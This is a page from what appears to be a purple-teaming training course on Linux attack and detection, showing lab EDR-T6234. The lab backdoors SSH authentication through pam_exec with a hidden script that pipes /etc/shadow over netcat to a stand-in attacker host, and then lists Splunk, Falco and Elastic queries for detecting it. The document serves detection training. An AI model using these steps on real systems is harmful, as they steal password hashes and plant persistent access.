Linux Attack, Detection and Forensics v2.0 - Hands-on Purple Teaming Playbook
- Buy now
- Learn more
- Discussions
Introduction

Welcome to the v2.0 party!
Goals / What to expect
Active Defense, Purple Teaming & DE
Linux DFIR Introduction
PurpleLabs Detection and Hunting Dashboard
General Course Flow Design
Private Virtual Machines
Shared Virtual Machines
PurpleLabs VM Robot Tool
EDRmetry Matrix
EDRmetry Matrix + HexStrike AI Integration
Why Linux as a target?
Linux Threat Landscape
Open Source Community
Recommended books
[ Changelog / Updates ]
Golden Rules - Before You Start Hands-on

Explore widely, think broadly
Enable Runtime Security/DFIR Agents
SOCKS Proxy or SSH Tunneling is required
KALI_X or C2_X?
TARGET_X - Kernel upgrade/downgrade
Multi-tab terminal
What is O- ?
"Don't" Policies
Troubleshooting
Defensive/DFIR Tooling

Host/Exploration of CLI tools
Host/Exploration of /proc
Host/Exploration of /sys
Host/Splunk Forwarder
Host/Falco Runtime Security
Host/Kunai Runtime Security
Host/Tetragon Runtime Security
Host/Tracee Runtime Security
Host/Jibril Runtime Security
Host/Elastic Security Agent
Host/Wazuh Agent
Host/Velociraptor Agent
Host/FleetDM OSquery Agent
Host/Sandfly Security
Host/Sysmon4Linux
Host/Syslog
Host/auditd
Host/Linux IR Scripts - SecureProbes
Host/UAC
Host/Ghostscan
Host/bpftrace
Host/LKRG
Host/SELinux
Host/Capa
Host/Yara / Yara-x Scanning
Network/Zeek NIDS
Network/Suricata NIDS
Network/WAF Modsecurity
Memory/Volatility3 Framework
Memory/Volatility2 Framework
Commercial Linux EDR/Security Products
Linux EDR Architecture

Introduction
What is Linux EDR engine?
How does Linux EDR work?
Core functionalities and key features
Visibility Events / Indexes / Data sources
Syscalls, Kernel Functions and Tracing Visibility
Detection logic / rulesets
Support for Sigma Rules
Engine Modes
Dashboards, Analytics & Query language
Response, Triage and Forensics
Deployment and Operations
Alerts / Incidents / Detections
Query Language
Linux EDR Telemetry Project
Linux MITRE ATT&CK Matrix

Introduction
Initial Access - TA0001

TA0001 - Introduction
EDR-T6261 - Remote UAF Exploitation - user
EDR-T6119 - Remote UAF Exploitation - root
EDR-T6354 - Remote UAF+Heap Overflow
EDR-T6062 - Kafka CVE-2023-25194
EDR-T6355 - Langflow API CVE-2025-3248
EDR-T6114 - ActiveMQ CVE-2023-46604
EDR-T6105 - Apache HTTP CVE-2021-41773
O-EDR-T6116 - Tomcat Upload Manager
EDR-T6110 - Solr Log4J JNDI CVE-2021-44228
EDR-T6233 - XZ Backdoor CVE-2024-3094
EDR-T6113 - Spring CVE-2022-22963
EDR-T6416 - React2shell - CVE-2025-55182
Execution - TA0002

TA0002 - Introduction
EDR-T6277 - Built-in System Tools Execution
EDR-T6041 - Execute binary listening from a hidden directory
Persistence - TA0003

TA0003 - Introduction
EDR-T6395 - LKM LibZeroEvil r00tme
EDR-T6394 - LKM Singularity Rootkit
EDR-T6100 - LKM Char Device + LPE
EDR-T6163 - LKM Reveng Rootkit
EDR-T6023 - LKM Diamorphine Rootkit
EDR-T6289 - LKM Ftrace Rootkit - Rebellion
EDR-T6161 - LKM BDS Ftrace Hooking Rootkit
EDR-T6154 - LKM Suterusu Rootkit
EDR-T6155 - LKM KoviD Rootkit
EDR-T6152 - eBPF Boopkit Rootkit
EDR-T6151 - eBPF TripleCross Rootkit
EDR-T6104 - SSHD Dummy Cipher Suite BYOT
EDR-T6235 - LD_PRELOAD Re-adding SSH key
O-EDR-T6327 - LD_PRELOAD Father Rootkit
EDR-T6422 - bdvl - Patch Dynamic Linker
EDR-T6423 - SSHD id_ed25519 Key Backdoor
EDR-T6170 - Cap_setuid over LD linker
EDR-T6139 - Python .pth Extensions
O-EDR-T6407 - Shadow SUID binfmt_misc
EDR-T6093 - Crontab root Backdoor
EDR-T6431 - Supervisor persistence
EDR-T6015 - Systemd Backdoor service
EDR-T6179 - Udev+atd C2 persistence
O-EDR-T6213 - Malicious RPM package
EDR-T6164 - PAM Sneaky Backdoor
EDR-T6144 - DNF Package Manager
EDR-T6051 - Modify core_pattern
EDR-T6347 - Nginx Shell Module
O-EDR-T6017 - HTTPD mod_backdoor
EDR-T6011 - PHP Webshells
Privilege Escalation - TA0004

TA0004 - Introduction
EDR-T6109 - LPE Socket Command Injection
EDR-T6360 - Huge pages Kernel UAF LPE
EDR-T6184 - PATH Hijacking
O-EDR-T6315 - Add SSH key via iptables-save
EDR-T6335 - sudo chroot CVE-2025-32463
EDR-T6147 - Docker Escape with socket+Chisel
EDR-T6417 - Docker Escape with core_pattern
EDR-T6187 - NFS SUID Escalation
EDR-T6230 - pkexec CVE-2021-4034
EDR-T6231 - DirtyPipe CVE-2022-0847 LPE
O-EDR-T6177 - MySQL UDF Command Exec
Defense Evasion - TA0005

TA0005 - Introduction
EDR-T6039 - File Transfer to a hidden directory
EDR-T6138 - Bash HTTP GET data with /dev/tcp
EDR-T6173 - Hackshell + OpenSSL download
EDR-T6340 - Python HTTP POST and Exec
O-EDR-T6363 - Base64 Payload inside ZIP
EDR-T6370 - Sneaky_remap + Ptrace() Process Injection in Rust + SSL/TLS callback
EDR-T6127 - dd+/proc/PID/mem Injection
EDR-T6256 - STOP/CONT Process Injection
EDR-T6108 - ASM Injection over /proc/PID/mem
EDR-T6037 - Python3 Fileless memfd_create
EDR-T6188 - Fileless Execution with memexec
EDR-T6171 - Easy Proc Name Masquerading
EDR-T6038 - Proc Name Masq with exec
EDR-T6140 - Proc Name Masq with prctl()
EDR-T6345 - Proc Masq with mount NS
EDR-T6046 - LD_PRELOAD Proc Hiding
EDR-T6053 - mount --bind process hiding
EDR-T6253 - eBPF Process Hider
EDR-T6107 - LKM Fileless Remote Loading
EDR-T6396 - LKM Hooking init_module
EDR-T6293 - LKM Disabling SELinux
EDR-T6282 - LKM Reset Yama ptrace_scope
EDR-T6167 - BOF Loading with BOF-Stager
EDR-T6067 - SSH notty session
EDR-T6133 - File immutable with chattr
EDR-T6089 - Bashrc File Hiding with ls Alias
O-EDR-T6078 - Execute tools via PRoot BYOF
Command and Control - TA0011

TA0011 - Introduction
EDR-T6123.023 - curlrevshell
EDR-T6123.008 - Revshell openssl+/dev/fd/3
EDR-T6123.004 - Revshell mkfifo+nc
EDR-T6123.022 - Oneshell - echo and chmod
EDR-T6123.015 - Revshell Python TLS
O-EDR-T6126.002 - Sliver C2 MTLS
EDR-T6126.013 - Sliver C2 HTTPS
O-EDR-T6126.007 - Sliver C2 DNS
O-EDR-T6126.011 - Sliver C2 TCP Pivots
EDR-T6212 - Emp3r0r HTTP2 AES Stager C2
EDR-T6317 - SOA/ECS DNS C2 Channel
EDR-T6115 - DNS Tunneling with dnscat2
O-EDR-T6409 - Venom C2
O-EDR-T6126.006 - Platypus C2
EDR-T6126.004 - Merlin HTTP2 C2
EDR-T6126.010 - Mythic C2 Deployment
O-EDR-T6126.003 - Mythic C2 Thanatos ELF
O-EDR-T6126.009 - Mythic C2 Medusa Python
O-EDR-T6126.005 - Mythic C2 Poseidon ELF
O-EDR-T6148 - XOR shell_reverse_tcp Loader
EDR-T6117 - UPX Reverse SSH server
EDR-T6123.017 - Shell over HTTP streams
Credential Access - TA0006

TA0006 - Introduction
EDR-T6242 - eBPF Spy on PAM with python3
EDR-T6199 - eBPF pamspy
EDR-T6012 - Sniff sshd with strace
EDR-T6415 - ptrace() ssh-inject
EDR-T6319 - Dump heap memory from Java
Discovery - TA0007

TA0007 - Introduction
EDR-T6225 - Execute "What Server"
EDR-T6040 - Execute LinPEAS from /dev/tcp
EDR-T6065 - /proc/PID/ Enumeration
EDR-T6251 - Process Snooping with pspy
EDR-T6280 - Find loaded eBPF programs/maps
EDR-T6218 - Linux VM Check via Hardware
EDR-T6204 - Read local file using curl
EDR-T6010 - Check my public IP
EDR-T6412 - DNS Reconnaissance
Lateral Movement - TA0008

TA0008 - Introduction
EDR-T6189 - Reverse SOCKS5 proxy
EDR-T6357 - Chisel Reverse Socks Proxy
EDR-T6255 - KCP - FRP Fast Reverse Proxy
EDR-T6404 - mTLS Reverse SOCKS5
O-EDR-T6387 - SOCKS5 over Tailscale
EDR-T6392 - Cloudflared Tunneling
EDR-T6131 - Hijacking SSH Client Session
O-EDR-T6364 - Hijacking ssh-agent session
EDR-T6057 - Execute Port Scanning
Exfiltration - TA0010

TA0010 - Introduction
EDR-T6120 - Python FTP Upload
EDR-T6180 - SMB Data Exfiltration
EDR-T6112 - NTP Data Exfiltration
EDR-T6137 - HTTP PUT method + transfer.sh
EDR-T6181 - Upload/download data over SSHFS
O-EDR-T6135 - Upload data over WebDAV
EDR-T6234 - pam_exec SSHD Exfiltration
O-EDR-T6103 - PAM creds over HTTP Post
O-EDR-T6168 - ICMP_exfil + nping
EDR-T6418 - LDAP Data Hiding - FreeIPA
Impact - TA0040

TA0040 - Introduction
O-EDR-T6063 - Ransomware C - lokpack
O-EDR-T6252 - Crypto Mining CPU stress
O-EDR-T6018 - Ransomware bash+openssl
Attack Flows & Combos

Introduction
Combo Flows
Attack Flow #1
Attack Flow #2
Attack Flow #3
Active Security Research

Extra Research
Linux Internals
LSM Sandboxes
eBPF
Exploitation
Kubernetes
Evasion / Bypassing techniques
Rootkits
Malware
OS Security Stacks
Memory Forensics
Fun

EDR-T6234 - pam_exec SSHD Exfiltration

EDR-T6234 - This test uses the PAM subsystem by including a new line that executes a script named .EDR-T6234-pam-exec-exfil.sh via pam_exec during SSH authentication attempts.

OFFENSIVE PHASE:

@ TARGET_X:

A). Add the below line as a 2nd one in /etc/pam.d/sshd:

auth       optional     pam_exec.so seteuid /usr/lib64/.EDR-T6234-pam-exec-exfil.sh

B). Create /usr/lib64/.EDR-T6234-pam-exec-exfil.sh with content below:

# vim /usr/lib64/.EDR-T6234-pam-exec-exfil.sh

#!/bin/bash
cat /etc/shadow | nc KALI_X_or_C2_X 5555

C). Set executable bit on script:

# chmod +x /usr/lib64/.EDR-T6234-pam-exec-exfil.sh

@ KALI_X_or_C2_X:

nc -vnlp 5555

@ TARGET_X:

# ssh -l redman 0

DETECTION/DFIR PHASE:

Splunk - Kunai Runtime Security:

index=kunai host="targetX.edrmetry.local" data.ancestors="/usr/lib/systemd/systemd|/usr/sbin/sshd|/usr/sbin/sshd" | top 10 command_line

Splunk - Kunai Runtime Security:

index=kunai host="targetX.edrmetry.local" data.ancestors="/usr/lib/systemd/systemd|/usr/sbin/sshd|/usr/sbin/sshd" command_line="/bin/bash /usr/lib64/.EDR-T6234-pam-exec-exfil.sh" event_name=execve_script

Splunk - Kunai Runtime Security:

index=kunai host="targetX.edrmetry.local" data.ancestors="/usr/lib/systemd/systemd|/usr/sbin/sshd|/usr/sbin/sshd*" shadow event_name=read_config| spath "data.command_line" | search "data.command_line"!="/usr/sbin/unix_chkpwd*"

Splunk - Falco Runtime Security:

index=unix falco host="targetX.edrmetry.local" "Sensitive file opened for reading by non-trusted program"

Elastic Security:

Unusual SSHD Child Process

Elastic Security:

Creation or Modification of Pluggable Authentication Module or Configuration

LINKS:

https://www.group-ib.com/blog/pluggable-authentication-module/